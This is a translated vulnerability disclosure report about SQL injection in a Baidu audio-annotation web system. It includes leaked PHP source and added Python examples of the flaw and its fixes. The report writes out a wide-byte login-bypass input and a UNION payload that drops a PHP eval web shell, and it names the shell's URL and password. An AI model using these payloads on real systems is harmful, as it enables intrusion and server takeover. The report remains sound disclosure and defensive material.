
Vulnerability summary (24 followers)

Defect ID: wooyun-2015-0157024

Title: SQL injection to getshell in a Baidu system

Vendor: 百度 (Baidu)

Author: 玉林嘎

Submitted: 2015-11-30 13:29

Fixed: 2016-01-14 18:46

Published: 2016-01-14 18:46

Vulnerability type: SQL injection

Severity: High

Self-assessed rank: 20

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2015-11-30: Details sent to the vendor, awaiting processing
2015-11-30: Vendor confirmed; details disclosed to the vendor only
2015-12-10: Details disclosed to core white hats and domain experts
2015-12-20: Details disclosed to regular white hats
2015-12-30: Details disclosed to intern white hats
2016-01-14: Details disclosed to the public

Brief description:

I'm back again.

Detailed description:

http://115.239.210.62:8080 is a Baidu system for audio work.
The page is served as GBK, so I suspected a wide-byte injection.

[Screenshot: 1.png]

Logging in with the username %df' or 1# bypasses the login check.

[Screenshot: 2.png]

[Screenshot: 3.png]
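The escaping failure behind the %df' bypass, as an added example that is not code from the report or from the affected system. It is written in Python rather than PHP so that it runs stand-alone: naive_escape models mysql_real_escape_string on a connection whose client charset does not match the GBK page, unescaped_quotes counts the quotes a GBK-configured server would treat as string delimiters, and charset_aware_escape is the character-level check that rejects a stray 0xDF byte. The function names are hypothetical; the query shape follows the login query in member_login.php.

```python
# Added example, not the affected system's code.  Models why a GBK page plus
# byte-wise escaping lets a lone 0xDF byte absorb the escaping backslash, and
# the charset-aware check that stops it.

# Escapes applied by mysql_real_escape_string when it believes the connection
# charset is single-byte (latin1) although the application speaks GBK.
_ESCAPES = {
    0x00: b"\\0", 0x0A: b"\\n", 0x0D: b"\\r", 0x1A: b"\\Z",
    0x22: b'\\"', 0x27: b"\\'", 0x5C: b"\\\\",
}


def naive_escape(data: bytes) -> bytes:
    """Byte-wise escaping: correct for single-byte charsets, wrong for GBK."""
    return b"".join(_ESCAPES.get(b, bytes([b])) for b in data)


def charset_aware_escape(data: bytes, charset: str = "gbk") -> bytes:
    """Escape characters, not bytes: decode strictly in the connection charset
    first (0xDF followed by a quote is not a GBK character and is rejected),
    escape per character, then re-encode.  This is what the escaper does once
    it has been told the real charset (mysql_set_charset in PHP)."""
    try:
        text = data.decode(charset)
    except UnicodeDecodeError as exc:
        raise ValueError(f"input is not valid {charset}: {exc}") from None
    escaped = "".join(
        _ESCAPES[ord(ch)].decode("ascii") if ord(ch) in _ESCAPES else ch
        for ch in text
    )
    return escaped.encode(charset)


def escape_or_reject(data: bytes, charset: str = "gbk"):
    """Escaped bytes, or None when the input is malformed in the charset."""
    try:
        return charset_aware_escape(data, charset)
    except ValueError:
        return None


def build_login_query(name: bytes, escape=naive_escape) -> bytes:
    """Same shape as the report's login query, password clause omitted."""
    return b"select id,authority from annotator where Name='" + escape(name) + b"'"


def unescaped_quotes(query: bytes) -> int:
    """Count quotes that a GBK-configured MySQL parser sees as string
    delimiters: quotes not preceded by a backslash in the *decoded* text.
    A well-formed single-condition query has exactly two."""
    text = query.decode("gbk", errors="replace")
    return sum(
        1 for i, ch in enumerate(text)
        if ch == "'" and (i == 0 or text[i - 1] != "\\")
    )


if __name__ == "__main__":
    # Constructed inputs: a benign name with a quote, and the wide-byte variant.
    for name in (b"alice'", b"test\xdf'"):
        q = build_login_query(name)
        print(name, "->", q, "delimiters seen by GBK parser:", unescaped_quotes(q))
    print("charset-aware:", escape_or_reject(b"alice'"), escape_or_reject(b"test\xdf'"))
```

With the benign input the escaped query still has two delimiters. With 0xDF in front of the quote, the escaper emits 0xDF 0x5C 0x27; a GBK parser reads 0xDF 0x5C as one two-byte character and the quote that follows is live again, which is the third delimiter the function reports. The durable fix is not a better escaper but parameter binding (PDO or mysqli prepared statements) plus a connection charset that matches the page, so that no SQL is assembled from escaped strings at all.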


Once in the back end I wanted to drop a shell, but there is no upload function at all.
Some pages emit warnings that disclose the absolute path, so I tried my earlier approach of writing a shell through SQL.

[Screenshot: 4.png]

But writing a shell with into outfile '<path>' does not work here: the single quote around the path gets escaped.
The back end has many injection points, so I tried reading files instead.

[Screenshot: 6.png]

Files can be read, so the next step is to audit the source and look for a way to get a shell.

/home/audio/label/apache/htdocs/new_user_post.php
/home/audio/label/apache/htdocs/new_user.php
/home/audio/label/apache/htdocs/label/index.php
/home/audio/label/apache/htdocs/register.php
/home/audio/label/apache/htdocs/user_management.php
/home/audio/label/apache/htdocs/user_modify.php
/home/audio/label/apache/htdocs/user_work.php
/home/audio/label/apache/htdocs/user_work_show.php
/home/audio/label/apache/htdocs/session_destroy.php
/home/audio/label/apache/htdocs/user_delete.php
/home/audio/label/apache/htdocs/member_login.php
/home/audio/label/apache/htdocs/inc.php
/home/audio/label/apache/htdocs/user_modify_post.php


Reading the files above: they do simple CRUD and nothing else.
The injections cannot introduce a single quote, but from experience a second-order injection can.
So the next step is to find a second-order injection whose sink is a SELECT, since only there can writing a file be attempted.
The breakthrough is in the files below.

/home/audio/label/apache/htdocs/user_work.php
/home/audio/label/apache/htdocs/user_work_show.php


<?php
require('inc.php');
if (isset($_SESSION['wav']) && is_file($_SESSION['wav']) && !unlink($_SESSION['wav']))
{
    echo "Warning:deleting".$_SESSION['wav']."failed";
}
if (isset($_SESSION['pic']) && is_file($_SESSION['pic']) && !unlink($_SESSION['pic']))
{
    echo "Warning:deleting".$_SESSION['pic']."failed";
}
if (isset($_SESSION['adpcm']) && is_file($_SESSION['adpcm']) && !unlink($_SESSION['adpcm']))
{
    echo "Warning:deleting".$_SESSION['adpcm']."failed";
}
if(isset($_GET['jump']))
{
    if($_GET['jump']==1)
    {
        unset($_SESSION['speechid'],$_SESSION['adpcm'],$_SESSION['wav'],$_SESSION['pic'],$_SESSION['table'],$_SESSION['effect'],$_SESSION['cut'],$_SESSION['noise'],$_SESSION['lang'],$_SESSION['comment'],$_SESSION['accent'],$_SESSION['sex'],$_SESSION['conf'],$_SESSION['fu']);
    }
    else if($_GET['jump']==2)
    {
        unset($_SESSION['speechid'],$_SESSION['adpcm'],$_SESSION['wav'],$_SESSION['pic'],$_SESSION['effect'],$_SESSION['table'],$_SESSION['cut'],$_SESSION['noise'],$_SESSION['lang'],$_SESSION['comment'],$_SESSION['accent'],$_SESSION['sex'],$_SESSION['conf'],$_SESSION['fu'],$_SESSION['fcon'],$_SESSION['su']);
    }
}
if(empty($_SESSION['pass']) || $_SESSION['pass']!="ok")
{
    echo "请您重新<a href='index.php'>登录</a></br>";
    header("refresh:2; URL='index.php'");
    exit;
}
$link = getAN_DBLink();
if($_SESSION['auth']==2)
{
    $sql="select id,Name,authority,real_name from annotator where id=".$_SESSION['id']."";
}
else if($_SESSION['auth']==1)
{
    $sql="select id,Name,authority,real_name from annotator where authority>".$_SESSION['auth']." or id=".$_SESSION['id']."";
}
else if($_SESSION['auth']==0)
{
    // sink: the session value is concatenated into the query unquoted and unvalidated
    $sql="select id,Name,authority,real_name from annotator where authority>=".$_SESSION['auth']."";
}
else
{
    echo "权限分配有误,请重新<a href='index.php'>登录</a></br>";
    header("refresh:2; URL='index.php'");
    exit;
}
$con="[query:".date('c')."]查询数据:".$sql.":user_work.php:line 61\r\n";
write_log($con);
$result=mysql_query($sql) or die("数据库查询失败");
$num=mysql_num_rows($result);
if($_SESSION['work']=="annotate")
    $chn_type="标注";
else if($_SESSION['work']=="check")
    $chn_type="检查";
else
    $chn_type="精选";
?>


else if($_SESSION['auth']==0)
{
    $sql="select id,Name,authority,real_name from annotator where authority>=".$_SESSION['auth']."";
}


$_SESSION['auth'] is the only parameter I found that appears inside a SELECT and might be controllable.
$_SESSION is populated at login, so let's look at the login file.

/home/audio/label/apache/htdocs/member_login.php


<?php
require_once ('inc.php');
if(empty($_POST['name'])){
    echo "用户名不能为空,自动返回登录界面...</br></br>";
    echo "点击返回<a href='index.php'>登录界面</a>";
    header("refresh:2; URL='index.php'");
    //echo "用户名不能为空,自动返回登录界面...</br></br>";
    //echo "点击返回<a href='index.php'>登录界面</a>";
    // header('Location:http://10.210.26.11:8080/index.php');
    exit;
}
else if(empty($_POST['password'])){
    echo "密码不能为空,自动返回登录界面...</br></br>";
    echo "点击返回<a href='index.php'>登录界面</a>";
    header("refresh:2; URL='index.php'");
    exit;
}
else if(empty($_POST['yzm'])){
    echo "验证码不能为空,自动返回登录界面...</br></br>";
    echo "点击返回<a href='index.php'>登录界面</a>";
    header("refresh:2; URL='index.php'");
    exit;
}
$link = getAN_DBLink();
// byte-wise escaping; on this GBK page a leading %df byte swallows the added backslash
$name = mysql_real_escape_string($_POST['name'], $link);
$pw = mysql_real_escape_string($_POST['password'], $link);
$code =$_POST['yzm'];
if( $code != $_SESSION["Checknum"])
{
    echo "验证码错误,自动返回登录界面...</br></br>";
    echo "点击返回<a href='index.php'>登录界面</a>";
    mysql_close();
    header("refresh:2; URL='index.php'");
    exit;
}
// injection point: the escaped $name still terminates the string under GBK
$sql="select id,authority,real_name,Gender,Mobile,Ikey,Mail,Login_ip,Login_time from annotator where Name='".$name."' and Passwd='".md5($pw)."'";
$con="[query:".date('c')."]数据库查询:".$sql.":member_login.php:line 43\r\n";
write_log($con);
$result=mysql_query($sql, $link) or die("数据库查询失败");
$num=mysql_num_rows($result);
if($num==0)
{
    echo "账户不存在,自动返回登录界面...</br></br>";
    echo "点击返回<a href='index.php'>登录界面</a>";
    mysql_close();
    header("refresh:2; URL='index.php'");
    exit;
}
$rs=mysql_fetch_object($result);
//while($rs=mysql_fetch_object($result))
if ($rs != false)
{
    $_SESSION['pass'] ="ok";
    $_SESSION['num'] =0;
    $_SESSION['name'] =$name;
    $_SESSION['id'] =$rs->id;
    // attacker-chosen when the query above was a UNION; reused unquoted in user_work.php
    $_SESSION['auth'] =$rs->authority;
    $_SESSION['rname'] =$rs->real_name;
    $_SESSION['gender'] =$rs->Gender;
    $_SESSION['mobile'] =$rs->Mobile;
    $_SESSION['ikey'] =$rs->Ikey;
    $_SESSION['mail'] =$rs->Mail;
    $_SESSION['type'] =$_POST['type'];
    $time =date('U');
    $ip ="";
    if(isset($_SERVER['HTTP_CLIENT_IP']))
    {
        $ip=$_SERVER['HTTP_CLIENT_IP'];
    }
    else if(isset($_SERVER['HTTP_X_FORWARDED_FOR']))
    {
        $ip=$_SERVER['HTTP_X_FORWARDED_FOR'];
    }
    else{
        $ip=$_SERVER['REMOTE_ADDR'];
    }
    // the excerpt quoted in the report ends here


$_SESSION['auth']     =$rs->authority;


$rs, in turn, is the row returned by

$sql="select id,authority,real_name,Gender,Mobile,Ikey,Mail,Login_ip,Login_time from annotator where Name='".$name."' and Passwd='".md5($pw)."'"


so at login a UNION query can set authority directly.
The name field only needs to carry the following:

test%df' union select 1,0x3020756e696f6e2073656c65637420312c322c332c3c3f706870206576616c28245f504f53545b735d293b3f3e20696e746f206f757466696c6520272f686f6d652f617564696f2f6c6162656c2f6170616368652f6874646f63732f746573742e70687027,3,4,5,6,7,8,9#


0x3020756e696f6e2073656c65637420312c322c332c3c3f706870206576616c28245f504f53545b735d293b3f3e20696e746f206f757466696c6520272f686f6d652f617564696f2f6c6162656c2f6170616368652f6874646f63732f746573742e70687027
0 union select 1,2,3,<?php eval($_POST[s]);?> into outfile '/home/audio/label/apache/htdocs/test.php'


With the UNION query we not only bypass the login but also set the second column (authority) to 0 union select 1,2,3,<?php eval($_POST[s]);?> into outfile '/home/audio/label/apache/htdocs/test.php'
Once logged in, just visit user_work.php, which runs that value inside its own SELECT.
The resulting shell is http://115.239.210.62:8080/label/test.php, password: s
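The second-order path, as an added example that is not the affected system's code. It models the chain on SQLite in Python: the login query's UNION puts an attacker-chosen string into the session's authority value, and the SELECT in user_work.php concatenates it. The file-writing tail from the report is replaced by a harmless marker string. Table and column names follow the report's queries; INJECTED_AUTH, validate_authority and the other helper names are hypothetical.

```python
# Added example, not the affected system's code: the report's second-order
# injection modelled on SQLite, with the two checks that close it.
import sqlite3

ROLE_IDS = (0, 1, 2)   # the three authority values user_work.php branches on


def make_db() -> sqlite3.Connection:
    """Constructed annotator table with the columns the report's queries use."""
    db = sqlite3.connect(":memory:")
    db.execute(
        "create table annotator (id integer, Name text, authority integer, real_name text)"
    )
    db.executemany(
        "insert into annotator values (?,?,?,?)",
        [(1, "admin", 2, "Admin"), (2, "alice", 0, "Alice")],
    )
    return db


# Shape of the value the report shows reaching $_SESSION['auth'] through the
# UNION in the login query; the file-writing tail is replaced by a marker row.
INJECTED_AUTH = "0 union select 1,2,3,'injected'"


def vulnerable_work_query(db, session_auth) -> list:
    """Mirror of the authority>=... branch in user_work.php: the session value
    is concatenated, so whatever the login query returned is executed."""
    sql = (
        "select id,Name,authority,real_name from annotator where authority>="
        + str(session_auth)
    )
    return db.execute(sql).fetchall()


def validate_authority(value) -> int:
    """Treat authority as an enum.  A value that came out of the database is
    not trustworthy when the query that produced it was injectable, so this
    belongs both where member_login.php copies the row into $_SESSION and
    where user_work.php uses it."""
    try:
        auth = int(str(value))
    except ValueError:
        raise ValueError(f"authority is not an integer: {value!r}") from None
    if auth not in ROLE_IDS:
        raise ValueError(f"unknown authority level: {auth}")
    return auth


def authority_is_valid(value) -> bool:
    try:
        validate_authority(value)
        return True
    except ValueError:
        return False


def hardened_work_query(db, session_auth) -> list:
    """Re-check at the point of use and bind the value instead of concatenating."""
    auth = validate_authority(session_auth)
    return db.execute(
        "select id,Name,authority,real_name from annotator where authority>=?",
        (auth,),
    ).fetchall()


if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", vulnerable_work_query(db, INJECTED_AUTH))
    print("hardened  :", hardened_work_query(db, "0"))
    print("injected value accepted?", authority_is_valid(INJECTED_AUTH))
```

Run stand-alone, the vulnerable query returns the marker row alongside the real annotators, which is the UNION in the session value executing; the hardened query rejects the same value before any SQL is built. Validating the role at login and binding the parameter at use are independent checks: either alone breaks this chain, and together they also cover a session value altered between login and use.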

[Screenshot: QQ图片20151130132632.png]


The host is on an internal network; I did not go any further.

Proof of vulnerability:


Fix recommendation:

Once you are past the login, everything is injectable.

Copyright notice: when reposting, credit the source 玉林嘎@乌云


Vulnerability response

Vendor response:

Severity: High

Vulnerability rank: 20

Confirmed at: 2015-11-30 18:45

Vendor reply:

Thank you for your attention to Baidu security!

Latest status:

None